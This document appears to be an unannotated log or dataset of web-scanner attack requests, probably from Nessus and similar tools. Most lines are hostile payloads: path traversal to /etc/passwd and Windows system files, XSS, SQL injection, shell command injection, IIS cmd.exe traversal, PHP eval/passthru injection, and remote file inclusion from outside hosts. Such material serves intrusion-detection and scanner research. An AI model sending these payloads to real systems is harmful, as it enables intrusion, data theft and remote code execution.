#\n/2003transcripts/\n/scripts/callboth.php?seq=654321&out=123456&in=1331909373@nessus\\x0d\\x0aasteridex_in_code_injection.nasl\n/manager/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/esmozg5d.asp?<script>cross_site_scripting.nasl</script>\n/uvazfs7p.htm?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/d765w06j.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/?<script>document.cookie=\"testhhwu=7044;\"</script>\n/top.php?stuff='del\\x09q39954515\\x09#\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/frznctvhi0i5?\n/main.php?stuff=ver\\x0b>q78439825&rem\\x0b\n/scripts/dgkirazl.exe\n/javascript/mina.exe\n/javascript/sponsors.exe\n/cgi-bin/help.php?section='qualiteam_xcart_sql_xss.nasl\n/usercp.php?function=avataroptions:javascript:alert('vulnerable')\n/en-us/account/minis.php?month=../../../../../../etc/passwd\n/w4996nr0.kspx?<script>document.cookie=\"testttvs=7163;\"</script>\n/82q7ywa8.htm?<script>document.cookie=\"testpwew=1315;\"</script>\n/en-us/esmozg5d.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/macromedia.exe\n/o35zot2r.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/lmw4r201.idc?<script>document.cookie=\"testwews=8477;\"</script>\n/javascript/9.exe\n/scripts/lce0cbkfb8xx.cfm\n/admin/system.php3?cmd=cat /etc/passwd\n/bn857frh.mscgi?<script>cross_site_scripting.nasl</script>\n/cacti/protection.php?action=logout&siteurl=/etc/passwd\n/en-us/account/top.php?header=../../../../../../../../etc/passwd\n/qczkquis.fts?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/<script>document.cookie=\"testbnli=1975;\"</script>\n/bzuf9ozq.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/unauthenticated/..\\x01/..\\x01/..\\x01/..\\x01/var/user_def/ad.conf\n/icons/script.gif\n/help.php?q=\"del\\x09q12928131\\x09#\n/x7pclv4s.fts?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/scripts/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/manager/more.php?id=1'\n/examples/jsp/jsp2/el/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/javascript/j2ee.exe\n/ydexw8by.exe?<script>document.cookie=\"testulex=4996;\"</script>\n/examples/jsp/num/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/drhcprxk.passwd\n/xlaapmview.asp?p=2&msg=<script>alert($random)</script>\n/en-us/n9xlumt5.exe?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/ttxssh2_219/\n/scripts/ylrvly9nh_pf.asp\n/606wkcop.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jackrabbit/search.jsp?q=%\"<script>alert(1331919151)</script>\n/r3le3om5.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/news/index.dot?id=../../../../../../../../../../../..//boot.ini\\x00.jpg\n/cgi-win/texis.exe/junk\n/ap58k3ci.mscgi?<script>cross_site_scripting.nasl</script>\n/scripts/kfzqb5x87lvq.cfm\n/clk;59206305;7163019;e/\n/byrg33fw.jsp?<script>document.cookie=\"testexuu=5340;\"</script>\n/calendar.php?serverpath=/etc/passwd\\x00\nftp://192.168.229.156/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/main.php?logout=\"ping,-w,8000,-n,1,1.2.3.4|rem,\n/phpmyadmin/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/qb2xy9aw.exe?<script>cross_site_scripting.nasl</script>\n/cgi-bin/athenareg.php?pass= ;id\n/9kr0ih0v.kspx?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/xlj7h65o.cfm?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/mv8wxfy9.php?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.118:8080/ghl9il?\n/en-us/account/calendar_admin.pl?config=|cat /etc/passwd|\n/main.php?logout=ping;-w;7000;-n;1;1.2.3.4&rem;\n/8x6w469u.cfc?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/cgi-perl/gwweb.exe?help=bad-request\n/top.php?stuff=\"&del\\x09q25218299&rem\\x09\n/scripts/cevvxrxqxc_b.php3\n/o6ebbirj.x?<script>cross_site_scripting.nasl</script>\n/inc/formmail.inc.php?script_root=http://192.168.202.96:8080/4dckqcc0acprbz?\n/p043snfr.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;rm+/tmp/lknajdyaas\"\n/main.php?stuff='\\x0ddel q64854395 #\n/8x6w469u.fts?<script>document.cookie=\"testgfjr=1286;\"</script>\n/ny1b3qq4.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/1r8cfrlf.idc?<script>document.cookie=\"testydan=5106;\"</script>\n/h4bi26jd.cfm?<script>document.cookie=\"testhrzx=1150;\"</script>\n/examples/jsp/jsp2/el/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/examples/servlets/servlet/athenareg.php?pass= ;id\n/top.php?stuff=ver >q16934614&rem \n/demo/ms-pe02/catalog.php?cid=0&sid='\"&sortfield=title&sortorder=asc&pagenumber=1&main=http://cirt.net/rfiinc.txt?&\n/cgi.cgi/htimage.exe/path/filename?2,2\n/jnt3f86c.aspx?<script>document.cookie=\"testcmax=9270;\"</script>\n/recordings/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/javascript/dns.exe\n/scripts/udblphlq4nln.cgi\n/examples/jsp/sessions/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/javascript/hta.exe\n/c32web.exe/changeadminpassword\n/archivescriptingcom/\n/main.php?stuff=\"sleep\\x0911\\x09#\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331909287')</script>\n/examples/jsp/colors/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/htmlscript/\n/nsn/..\\util/lancard.bas\n/zroo33l4.pl?<script>document.cookie=\"testiklc=904;\"</script>\n/en-us/7o5qp766.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nuh3zirz.nsf?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/nslookup.cgi?query=localhost;id&type=any&ns=\n/0rufe52p.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/releases.exe\n/jnv890lt.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/rv98iwjp.asp?<script>cross_site_scripting.nasl</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;rm+/tmp/fmccqnzzib\"\n/gvx7m5ti.x?<script>document.cookie=\"testwldz=3506;\"</script>\n/0qhcnefz.kspx?<script>cross_site_scripting.nasl</script>\n/i686v90l.pl?<script>document.cookie=\"testfutf=1550;\"</script>\n/index.php?album=../../../../../../../../../../boot.ini\\x00\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.x\n/javascript/friend.exe\n/javascript/htpasswd.tpl\n/main.php?stuff=\"rm\\x0bq36113668&rem\\x0b\n/javascript/ep.exe\n/examples/jsp/jsp2/jspx/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n/xsqln7eb.idc?<script>document.cookie=\"testpcbb=9254;\"</script>\n/main.php?logout=\"uname >q29314884 #\n/jdx255ea.cfc?<script>document.cookie=\"testziyq=5055;\"</script>\n/javascript/webadmin.exe\n/l752x1ry.cfm?<script>cross_site_scripting.nasl</script>\n/script_path/config.inc.php?_path=http://192.168.202.96:8080/txenjrxf3??\n/scripts/tinfo.php?id=1331908818\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/tvzjwzrsfg0;').\"]=1\n/lmw4r201.x?<script>document.cookie=\"testwews=8477;\"</script>\n/javascript/y.exe\n/en-us/s7qus4g3.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/include/default_header.php?script_path=http://192.168.202.96:8080/4dckqcc0acprbz?\n/examples/jsp/checkbox/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/cleopatra - daddy's little girl/\n/cgi-bin/www/delivery/ac.php?bannerid=-1331918977+or+1=1+--+';passthru(base64_decode($_server[http_nessus_l1_kygob]));die;/*\n/scripts/nryr3lvrjnwx.cfm\n/bzuf9ozq.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=ver;>q42465427&rem;\n/javascript/blogger.exe\n/examples/jsp/sessions/popup.php?include_path=/etc/passwd\\x00\n/help.php?q=\"ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/aminscript/\n/3hlysl2x.jsp?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/top.php?stuff=';rm q64815511 #\n/scripts/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/admin/exec.php3?cmd=cat /etc/passwd\n/phpmyadmin/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/cgi-bin/fileseek.cgi?foot=;cat /etc/passwd&head=\n/javascript/cgiwrap.exe\n/gvx7m5ti.cgi?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/zffcwqffhn0+>+/dev/null+&'); function v\n/raanw4ia.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/empty.exe\n/javascript/pl.exe\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../vtigerservice.php\\x00\n/d5a5renl.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/hw3.cgi?daysonly=0).system('id').(\n/pxagj7n7.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\nhttp://xxxxxxxxxxx.:80/<script>alert('vulnerable')</script>.shtml\n/m4kkjf8l.aspx?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/oie504mr.htm?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/opensiteadmin/scripts/classes/filter.php?path=http://cirt.net/rfiinc.txt?\\x00\n/en-us/account/check_user_id.php?user_id=<script>foo</script>\n/main.php?logout=|ping;-w;8000;-n;1;1.2.3.4|rem;\n/secure_scripting/\n/cgi-bin/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/eg2u8pbv.nsf?<script>cross_site_scripting.nasl</script>\n/iktok2bw.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/profile.php?user='<iframe src=javascript:alert(%27wvs-xss-magic-string-410035568138%27)></iframe>\n/ydexw8by.pl?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/9o6g5vkn.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/nbmember.cgi?cmd=list_all_users\n/www/delivery/ac.php?bannerid=-1332010394+or+1=1+--+';passthru(base64_decode($_server[http_nessus_4bpj1wcm]));die;/*\n/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/main.php?stuff=@'\n/5o9zq43e.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iisadmpwd/..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/main.php?logout=\"|ping -w 10000 -n 1 1.2.3.4|rem \n/pxagj7n7.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"\\x0arm q86286812 #\n/ewc3rz1l.htm?<script>document.cookie=\"testkgqo=204;\"</script>\n/0rufe52p.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 435389080,2,2084643622,4,5,6,7,8,9,0,1,2,3 --\n/help.php?q=\"&del\\x09q99796972\\x09#\n/b17_children's program support worker/\n/examples/servlets/servlet/story.pl?next=../../../../../etc/passwd\\x00\n/forum1_professionnel.asp?n=1771&amp;nn=`/etc/passwd`&amp;page=1\n/fcgi-bin/gw5/gwweb.exe?htmlver=aaa&get-context\n/templates/prescription/\n/t7tm4m0b.idc?<script>cross_site_scripting.nasl</script>\n/en-us/w4996nr0.cfc?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/scripts/t99iadgtkf9h.cgi\n/manager/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/help.php?q='uname\\x09>q97653798\\x09#\n/examples/jsp/jsp2/el/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/csmajordescription/\n/help.php?q=\"|ping\\x09-w\\x097000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/scripts/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/managersearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/hipkz026.php3?<script>document.cookie=\"testyrbs=2855;\"</script>\n/ny1b3qq4.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/sarboxonlineseminartranscript/\n<meta http-equiv=set-cookie content=\"testnago=4518\">\n/javascript/.passwd.ora\n/help.php?q=\";uname\\x09#\n/main.php?stuff=\\\\'\n/cgi-bin/phf?qname=root\\x0acat /etc/passwd \n/phpmyadmin/phpmyadmin.css.php?collation_connection=utf8_general_ci&convcharset=utf-8&js_frame=right&lang=en-utf-8&nocache=3830415403&token=1\"\n/cgi-bin/index.php?op=default&date=200607' union select 1,678642094,1,1,1,1,1,1,1,1--&blogid=1\n/phpmyadmin/index.php?cat='\n/javascript/.passwd.html\n/fpnpp5zg.exe?<meta http-equiv=set-cookie content=\"testyias=101\">\n/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('vulnerable')</script>\n/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('vulnerable')</script>\n/top.php?stuff=';uname\\x09>q14376774\\x09#\n/examples/jsp/sessions/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/o6ebbirj.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/scripts/awredir.pl\n/main.php?stuff=\"ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/main.php?logout=\"&ver\\x0b>q19661861&rem\\x0b\n/examples/jsp/error/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/en-us/account/wa.exe?debug-show-version\n/qczkquis.php3?<script>document.cookie=\"testkwlg=5591;\"</script>\n/main.php?stuff=\";del\\x09q19299327\\x09#\n/examples/jsp/num/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/readmore.php?config[\"sipssys\"]=http://192.168.202.96:8080/4dckqcc0acprbz?\n/help.php?q='rm\\x09q19574333\\x09#\n/javascript/.passwd.tmp\n/en-us/hipkz026.php?<script>document.cookie=\"testyrbs=2855;\"</script>\n/scripts/6gl21a1hiz3s.pl\n/vhzmaia2.exe?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/3hlysl2x.html?<script>document.cookie=\"testgjbe=8505;\"</script>\n/main.php?stuff=\"|ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/8t9v8k7x.cgi?<script>document.cookie=\"testhvje=9403;\"</script>\n/examples/servlets/servlet/mylog.html?screen=/etc/passwd\n/examples/jsp/cal/config.php?returnpath=/etc/passwd\\x00\n/0u75ldxq.html?<script>cross_site_scripting.nasl</script>\n/l13b77e5.cfm?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/scripts/_vti_inf.html\n/de3v2dd9.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1;/usr/bin/id\n/mm_manuscript/\n/iajtej82.do?<script>cross_site_scripting.nasl</script>\n/javascript/htpasswd.asp\n/my_inscription/\n/cgi-bin/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/script/common.inc.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/main.inc.php?pathtoscript=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/examples/jsp/jsp2/jspx/snpfiltered.pl?t=c&u=<script>foo</script>\n/nsn/..\\util/attrib.bas\n/cgi-bin/index.php?src=1&_common=1&time=1331919221&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/scripts/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/en-us/account/config.php?returnpath=/etc/passwd\\x00\n/accountlogon.cfm?rtn=1\"><script>alert(\"411686083443\");</script><\"234\n/javascript/bugs.exe\n/scripts/index.php?module=navigation\n/j4drbkil.pl?<script>cross_site_scripting.nasl</script>\n/sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>\n/hsx/classifieds.hsx?db=\"<script>alert(1)</script><\"\n/examples/servlets/servlet/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/buyvaliumswithoutprescription/\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/&frm_user=&scr_height=&scr_width=q28259274\n/h5sc3gxy.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc\n/examples/jsp/cal/index.php?id='\n/hrttz9fj.mscgi?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/vmi8bb12.php?<script>document.cookie=\"testlerc=2575;\"</script>\n/phprocketaddin/?page=../../../../../../../../../../etc/passwd\n/igtf0zon.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/webdist.cgi?distloc=;id\n/help.php?q='uname\\x09>q97628579\\x09#\n/zmvq66jy.pl?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/index.php?func=manager&module=ew_filemanager&pathext=../../../etc&type=admin\n/scripts/admin/wwforum.mdb\n/top.php?stuff=\"\\x0arm\\x09q69986769\\x09#\n/en-us/i686v90l.idc?<script>document.cookie=\"testfutf=1550;\"</script>\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 854943738,2,566710091,4,5,6,7,8,9,0,1,2,3 --\n/div_description/\n/cgi-bin/handler/netsonar;cat /etc/passwd|?data=download\n/cgi-bin/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/help.php?q=;sleep\\x097\\x09#\n/cgi-bin/index.cfm?fuseaction=category.display&category_id='\n/javascript/akamai.exe\n/javascript/.passwd.msg\n/5o9zq43e.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/recordings/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/javascript/start.exe\n/javascript/.htaccess.sfish///skipfish.invalid/;?\n/en-us/account/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/yef5f3d5.asp?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/metcalf's_law/\n/h5sc3gxy.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q='\\x0drm q49373567 #\n/chat-scripts/\n/search.php?config[\\\"sipssys\\\"]=@rfiurl\n/gvx7m5ti.cfc?<script>document.cookie=\"testwldz=3506;\"</script>\n/main.php?stuff=\"&del\\x0bq62577827&rem\\x0b\n/cgi-bin/search.jsp?q=%\"<script>alert(1331922091)</script>\n/jnt3f86c.html?<script>document.cookie=\"testcmax=9270;\"</script>\n/javascript/document.gif\n<script>document.cookie=\"testcqwz=9752;\"</script>\n/help.php?q=\"\\x0arm q55525686 #\n/examples/jsp/jsp2/el/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/scripts/4rzefq7dsowk.shtml\n/examples/jsp/checkbox/wikka.php?wakka=homepage/../../actions/wikkachanges\n/examples/jsp/colors/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/0u75ldxq.fts?<script>cross_site_scripting.nasl</script>\n/6wb70v0b.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/location.exe\n/main.php?frm_daynight=day&frm_passwd=q82795564&frm_referer=http%3a//192.168.28.202/main.php&frm_user=&scr_height=&scr_width=\n/eei78ore.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/hipkz026.kspx?<script>document.cookie=\"testyrbs=2855;\"</script>\n/manager/supporter/tupdate.php?groupid=change&sg='\n/examples/jsp/num/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/scripts/shop.plx/page=nessus496750665\n/m5103snj.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/mailform.exe\n/javascript/en_us.exe\n/en-us/hipkz026.php3?<script>document.cookie=\"testyrbs=2855;\"</script>\n/yef5f3d5.jspa?<script>document.cookie=\"testcrcv=6167;\"</script>\n/apavxugx.cfm?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/d5a5renl.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/document.php\n/j4rdyhw8.dll?<script>document.cookie=\"testrluj=1420;\"</script>\n/x7pclv4s.fts?<script>document.cookie=\"testiulz=3709;\"</script>\n/examples/jsp/checkbox/topic.php?tid='select\n/v3axg1p8.aspx?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/bn857frh.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/p043snfr.fts?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&ver&rem\\x0b\n/ddoworrl.aspx?<script>document.cookie=\"testvlau=8517;\"</script>\n/weq93ppb.x?<script>cross_site_scripting.nasl</script>\n/help.php?q=;del q31144684 #\n/xlj7h65o.nsf?<script>document.cookie=\"testtbbe=856;\"</script>\n/vac1l5vm.nsf?<script>cross_site_scripting.nasl</script>\n/ewc3rz1l.exe?<script>document.cookie=\"testkgqo=204;\"</script>\n/fnwhrxyd.cfm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/sgdynamo.exe?htname=sgdynamo.exe\n/main.php?stuff=ping;-w;9000;-n;1;1.2.3.4|rem;\n/cgi-win/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/ybz5rz7a.htm?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/606wkcop.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/eei78ore.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/dir_thatware/config.php?root_path=http://192.168.202.118:8080/ghl9il?'\n/examples/servlets/servlet/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/javascript/day.exe\n/javascript/document.rb\n/cacti/minis.php?month=../../../../../../etc/passwd\n/1r8cfrlf.idc?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/quagynka.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/counter.exe\n/cgi-bin/www/delivery/ac.php?bannerid=-1332010394+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ybslwkfb]));die;/*\n/top.php?stuff=\"del\\xa0q29642432&rem\\xa0\n/t578vqea.asp?<script>document.cookie=\"testsory=7676;\"</script>\n/iissamples/issamples/query.idq?citemplate=../../../../../../../../../../winnt/win.ini\n/msadc/..\\xc0\\xaf../..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir\n/cgi-bin/scripts/slxweb.dll/getfile?type=library&file=[invalid filename]\n/javascript/setup.exe\n/odzk29aa.cfm?<script>document.cookie=\"testtfvh=2141;\"</script>\n/cgi-bin/source?v=../../../../../../../../../../etc/passwd\\x00\n/scripts/axdgpyi2bn6f.shtml\n/scripts/nph-exploitscanget.cgi?host=`id`&port=5488&errchk=0&idsbypass=0\n/forum1.asp?n=1753&amp;nn=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini\n/scripts/ui/login?user=nessus-1331919063\n/rnwscripts/\n/scriptv0106866/\n/scripts/2e./.2e/winnt/system32/cmd.exe?/x+/c+copy \\winnt\\system32\\cmd.exe hyij.exe\n/cgi-bin/index.php?src=1&_common=1&time=1331908884&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/en-us/s7qus4g3.cfc?<script>cross_site_scripting.nasl</script>\nftp://192.168.23.152/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/apavxugx.html?<script>document.cookie=\"testdnbh=5237;\"</script>\n/applescript_perl/\n/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd\\x00\n/quagynka.do?<script>cross_site_scripting.nasl</script>\n/ghswfouu.aspx?<script>document.cookie=\"testsqmm=5713;\"</script>\n/scgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/main.php?logout='uname >q43392461 #\n/perlscripts/\n/phpwcms_template/inc_script/frontend_render/navigation/config_phplm.php?html_menu_dirpath=http://192.168.202.118:8080/ghl9il?\n/?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/admin/common/.script.js.php.swp\n/main.php?logout=\\x0auname >q84859623 #\n/scripts/sqlbrowse.asp\n/javascript/.passwd.doc\n/egaet53a.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7u1pb2xi.cgi?<script>document.cookie=\"testlwwz=718;\"</script>\n/scriptsearch-micro/\n/cgi-perl/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/apavxugx.pl?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/main.php?logout=\"&rm\\xa0q18437972&rem\\xa0\n/javascript/db.exe\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/zoywsxjghe.sh'); function v\n/h5sc3gxy.do?<script>cross_site_scripting.nasl</script>\n/scripts/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/main.php?stuff=\"\\x0duname\\x09>q53275598\\x09#\n/main.php<?eval($_post['q28117717']);?eval($_post['q28117717']);?>\n/top.php?stuff=;uname\\x09#\n/javascript/entry.exe\n/fo564rei.asp?<script>cross_site_scripting.nasl</script>\n/forum_2.php?msg=10&return=<script>foo</script>\n/nyjgaorz.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.118:8080/zz5thkvtmlgl?\n/cgi-perl/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/v3axg1p8.mscgi?<script>document.cookie=\"testxagh=6987;\"</script>\n/m4kkjf8l.do?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/eei78ore.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=ver >q52435225&rem \n/top.php?stuff=\"&uname\\x09>q26831864\\x09#\n/l13b77e5.php?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/3hlysl2x.x?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/d7ktpmcq.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/examples/jsp/checkbox/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/gvx7m5ti.cfm?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/examples/jsp/error/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/index.asp?user='\n/main.php?stuff='\\x0asleep\\x0910\\x09#\n/scripts/ui/login?user=nessus-1332009299\n/admin/news.admin.php?path_to_script=http://192.168.202.96:8080/swgnhpydbq0t??&cmd=ls\n/help.php?q=\"&del q86369979 #\n/examples/servlets/servlet/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/fmnveedu.php3?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,1704795451,0,0,0,0,0--\n/m4kkjf8l.kspx?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/javascript/htpasswd.lib\n/phpmyadmin/../phpmyadmin.tar\n/jnt3f86c.idc?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/cgi-914/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/en-us/fo564rei.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=;uname\\x09>q84429989\\x09#\n/scripts/irbf6nj7oyfh.cgi\n/examples/jsp/jsp2/jspx/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat 